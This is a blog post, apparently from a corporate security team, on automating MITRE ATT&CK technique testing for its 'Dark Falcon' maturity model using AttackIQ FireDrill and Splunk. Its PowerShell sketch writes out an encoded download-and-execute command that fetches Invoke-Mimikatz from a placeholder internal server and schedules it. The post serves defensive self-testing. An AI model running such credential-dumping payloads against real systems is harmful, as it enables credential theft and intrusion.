KNOWING YOUR BATTLE SPACE - PART 3
Part 2 - Review
In our last post we covered how we built a maturity model from the MITRE ATT&CK framework and used it to help visualize our environment. The topics we covered were:
- Scoring based on multiple decision points
- Mapping Specific Security Controls to Tactics
- Visualizing results for decision makers
PART 3
In this post we will touch on automated scoring for Dark Falcon. As we previously discussed, a big part of the Dark Falcon effort is centered around the MITRE ATT&CK framework. ATT&CK catalogs the tactics an adversary may use in their attempt to compromise a network. Thinking about this logically, we understood that we needed to be able to perform realistic tests against our infrastructure, which in turn would let us determine our readiness to detect and defend against those tactics. Lastly, we asked ourselves how we could do this in a fully automated way so humans can keep doing human things and not waste time on something a computer can easily do.
Build It Yourself or Work with a Trusted Partner?
Initially, while debating how to perform automated testing, we went down the path of building it ourselves from the ground up. For example, PowerShell is one of the MITRE ATT&CK techniques. We could spin up an internal attack server and perform the PowerShell technique test, which would use an encoded PowerShell command to run Invoke-Mimikatz. We could keep running down the list of techniques, write the actual attack script for each, and schedule these scripts to run automatically with something like scheduled tasks. At first this sounded like it wouldn't be too challenging: we had some talented coders on the team, some heavy-minded red team individuals, and access to our own infrastructure to host the tests. Then we thought about it at a much deeper level and began to understand just how quickly the effort to automate tests for so many adversarial techniques would balloon. For example, what about all the external-to-internal attacks? Those would require some kind of cloud infrastructure. Who was going to maintain all of this when tests inevitably broke over time? Furthermore, how would we formalize a framework for writing each test? These were all great questions that needed answers before we went any further. It was at this point that panic began to set in, because we felt like we had officially hit a roadblock we could not get around.
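For illustration, here is a minimal sketch of what one such self-built test might have looked like. Everything here is hypothetical: the internal attack server URL, the script path, and the task name are placeholders, and Invoke-Mimikatz is assumed to be staged on that server.

```powershell
# Hypothetical DIY technique test: encode a PowerShell payload and schedule it.
# The server URL and task name are placeholders, not a real production setup.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://attack-server.internal/Invoke-Mimikatz.ps1"); Invoke-Mimikatz'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# Run the encoded command weekly via a scheduled task so no human has to kick it off.
$action  = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument "-NoProfile -EncodedCommand $encoded"
$trigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Monday -At 3am
Register-ScheduledTask -TaskName 'DIY-ATTACK-PowerShellTest' -Action $action -Trigger $trigger
```

Multiply this by every technique, plus the care and feeding when payloads break, and the maintenance problem described above becomes obvious.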
AttackIQ FireDrill
After getting over the initial shock of what we had gotten ourselves into, we decided to work with the business to find a small piece of the budget to purchase a product on the market. After a lot of searching we settled on AttackIQ and their automated adversarial testing platform, FireDrill. The platform lets us deploy agents to any endpoint we want to run adversarial tests on. Each agent pulls intelligence from the AttackIQ cloud about which test it is supposed to perform and when it is scheduled to run, and reports full results back to the FireDrill console. A result is either a pass, meaning our security control stopped the test; a fail, meaning the test succeeded; or an error, meaning the test was unable to run. One key differentiator that really sold us was the ability to link multiple attacks together to mimic an attacker moving laterally within the network using multiple tactics.
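To make those three outcomes concrete, here is a rough sketch of how pass/fail/error results might roll up into a per-tactic score. The result objects below are a hypothetical shape for illustration, not FireDrill's actual API schema.

```powershell
# Hypothetical result records; FireDrill's real schema differs.
$results = @(
    [pscustomobject]@{ Tactic = 'Execution';         Outcome = 'pass'  }  # control blocked the test
    [pscustomobject]@{ Tactic = 'Execution';         Outcome = 'fail'  }  # test succeeded -> gap
    [pscustomobject]@{ Tactic = 'Credential Access'; Outcome = 'error' }  # test never ran
)

# Score each tactic as the share of passes among tests that actually ran;
# errors are excluded so a broken test doesn't look like a defended one.
$results | Group-Object Tactic | ForEach-Object {
    $ran  = @($_.Group | Where-Object Outcome -ne 'error')
    $pass = @($ran | Where-Object Outcome -eq 'pass')
    [pscustomobject]@{
        Tactic = $_.Name
        Score  = if ($ran.Count) { [math]::Round($pass.Count / $ran.Count, 2) } else { $null }
    }
}
```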
Once our testing infrastructure was in place, the last piece was getting the results from FireDrill testing back into Splunk. We decided it would be easiest to use the FireDrill API to write this data directly into Splunk and perform our analysis on it there. We then move the results into the Dark Falcon platform to score the environment on the particular tests that were run. With testing scheduled on a weekly basis, we were off and running.
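As a hedged sketch of that glue: the FireDrill URL, path, and token below are placeholders rather than AttackIQ's documented API, while the Splunk side uses the standard HTTP Event Collector.

```powershell
# Pull test results from the FireDrill API (endpoint and token are placeholders;
# consult AttackIQ's API documentation for the real paths and auth scheme) ...
$fireDrill = Invoke-RestMethod -Uri 'https://firedrill.example.com/api/results' `
                               -Headers @{ Authorization = "Token $env:FIREDRILL_TOKEN" }

# ... and forward each result to Splunk's HTTP Event Collector for analysis.
foreach ($result in $fireDrill) {
    $event = @{ sourcetype = 'attackiq:firedrill'; event = $result } | ConvertTo-Json -Depth 5
    Invoke-RestMethod -Uri 'https://splunk.example.com:8088/services/collector/event' `
                      -Method Post `
                      -Headers @{ Authorization = "Splunk $env:SPLUNK_HEC_TOKEN" } `
                      -Body $event
}
```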
Side Notes
While we ultimately decided to purchase a product for this portion of Dark Falcon, it is important to note there is some great work being done on the open source front to assist with automated testing of the MITRE ATT&CK techniques. One example is by Roberto Rodriguez; his work can be found here:
Cyb3rWard0g (Roberto Rodriguez) - https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI
It is also important to note that, at the time of this post, AttackIQ does not have all 169 MITRE ATT&CK techniques in its testing platform, so we did find ourselves still having to code some tests. This was easy to do because FireDrill allows direct input of code that the FireDrill agent will run for you on the endpoint. For example, it has a generic script execution test that will run any custom script you provide as input (e.g. encoded PowerShell, a batch file, a bash script).
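For instance, producing an encoded PowerShell string to feed into that generic script execution test might look like the following. The payload itself is purely illustrative.

```powershell
# Build an encoded PowerShell payload to supply to a generic script
# execution test (the command below is only an illustration).
$command = 'Get-Process lsass | Select-Object Id, ProcessName'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

# The agent would then run it on the endpoint as:
#   powershell.exe -NoProfile -EncodedCommand <encoded string>
$encoded
```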
So yeah, that's it: fully automated testing running on a weekly basis across our entire security infrastructure. That about wraps up the specifics of automated adversarial testing as it relates to Dark Falcon. Stay tuned for Part 4, where we will discuss how we overlay the kill chain and get into the details of our attack profiling.
Part 4
This post in the series starts looking at an extended view of the rich data you have available in Dark Falcon. We are constantly finding new ways of interacting with the ATT&CK tactics and their ratings in our environment. What we cover in this article is just the beginning of what is possible, and we are excited to hear what others are doing.
Today we will cover:
- Overlaying the Kill Chain
- Internal Kill Chain vs External Kill Chain
- Attack Profiling